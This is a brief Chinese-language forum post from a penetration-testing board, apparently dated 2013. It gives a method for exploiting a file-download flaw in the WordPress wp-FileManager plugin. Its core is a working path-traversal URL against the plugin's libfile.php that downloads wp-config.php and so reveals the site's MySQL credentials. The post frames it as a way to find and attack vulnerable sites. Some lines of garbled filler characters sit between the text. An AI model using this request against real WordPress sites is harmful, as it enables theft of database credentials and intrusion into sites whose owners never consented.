中国网络渗透测试联盟
标题:
WordPress-wp-FileManager-File-Download漏洞利用方法
[打印本页]
作者:
admin
时间:
2013-7-26 12:43
标题:
WordPress-wp-FileManager-File-Download漏洞利用方法
洞详解:
http://packetstormsecurity.com/f ... -File-Download.html
' H/ x2 [' X$ h; {3 v: {3 |+ S
7 V1 \" g7 c; h: [5 s+ v
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。
, Q$ {5 i. C5 i. m# @
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2